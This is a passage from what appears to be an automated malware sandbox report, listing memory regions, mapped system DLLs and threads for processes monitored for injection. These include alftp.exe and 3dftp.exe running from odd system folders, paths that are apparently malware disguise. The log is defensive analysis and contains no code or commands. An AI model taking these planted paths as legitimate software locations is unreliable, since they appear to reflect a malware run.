"pagefile_0x00000000001c0000" filename = "" Region: id = 1521 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1522 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1523 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1524 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1525 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1526 start_va = 0x450000 end_va = 0x453fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1527 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1528 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1529 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 1530 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 1531 start_va = 0xa80000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 1532 start_va = 0x1e80000 end_va = 0x1f3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 1533 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 1534 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1535 start_va = 0x2150000 end_va = 0x2b13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002150000" filename = "" Region: id = 1536 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1537 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1538 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1539 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1540 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1541 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1542 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1543 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1544 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1545 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1546 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1547 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1548 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1549 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1550 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1551 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1552 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1553 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1554 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1555 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1556 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1557 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1558 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1559 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1560 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1561 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1563 start_va = 0x1f60000 end_va = 0x210bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Thread: id = 85 os_tid = 0x8d4 Thread: id = 86 os_tid = 0xc84 Process: id = "10" image_name = "alftp.exe" filename = "c:\\program files\\windows portable devices\\alftp.exe" page_root = "0x56a10000" os_pid = "0x234" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\alftp.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1575 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1576 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1577 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1578 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1579 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1580 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1581 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1582 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1583 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1584 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1585 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1586 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1587 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1588 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1589 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1590 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 1591 start_va = 0x9a0000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 1592 start_va = 0xb30000 end_va = 0xbebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 1593 start_va = 0xc90000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 1594 start_va = 0xe40000 end_va = 0xe56fff monitored = 0 entry_point = 0xe414a1 region_type = mapped_file name = "alftp.exe" filename = "\\Program Files\\Windows Portable Devices\\alftp.exe" (normalized: "c:\\program files\\windows portable devices\\alftp.exe") Region: id = 1595 start_va = 0xe60000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 1596 start_va = 0x2410000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 1597 start_va = 0x2420000 end_va = 0x2de3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002420000" filename = "" Region: id = 1598 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1599 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1600 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1601 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1602 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1603 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1604 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1605 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1606 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1607 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1608 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1609 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1610 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1611 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1612 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1613 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1614 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1615 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1616 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1617 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1618 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1619 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1620 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1621 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1622 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1623 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 1629 start_va = 0x5c0000 end_va = 0x6b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Thread: id = 89 os_tid = 0x4d0 Thread: id = 90 os_tid = 0x27c Process: id = "11" image_name = "3dftp.exe" filename = "c:\\program files (x86)\\windowspowershell\\3dftp.exe" page_root = "0x1b401000" os_pid = "0x230" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\3dftp.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1630 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1631 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1632 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1633 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1634 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1635 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1636 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1637 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1638 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1639 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1640 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1641 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1642 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1643 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1644 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1645 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1646 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1647 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 1648 start_va = 0xb10000 end_va = 0xbcbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 1649 start_va = 0xc50000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 1650 start_va = 0x1320000 end_va = 0x1336fff monitored = 0 entry_point = 0x13214a1 region_type = mapped_file name = "3dftp.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\3dftp.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\3dftp.exe") Region: id = 1651 start_va = 0x1340000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001340000" filename = "" Region: id = 1652 start_va = 0x2740000 end_va = 0x3103fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002740000" filename = "" Region: id = 1653 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1654 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1655 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1656 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1657 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1658 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1659 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1660 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1661 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1662 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1663 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1664 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1665 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1666 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1667 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1668 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1669 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1670 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1671 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1672 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1673 start_va = 0x7feb0000 end_va 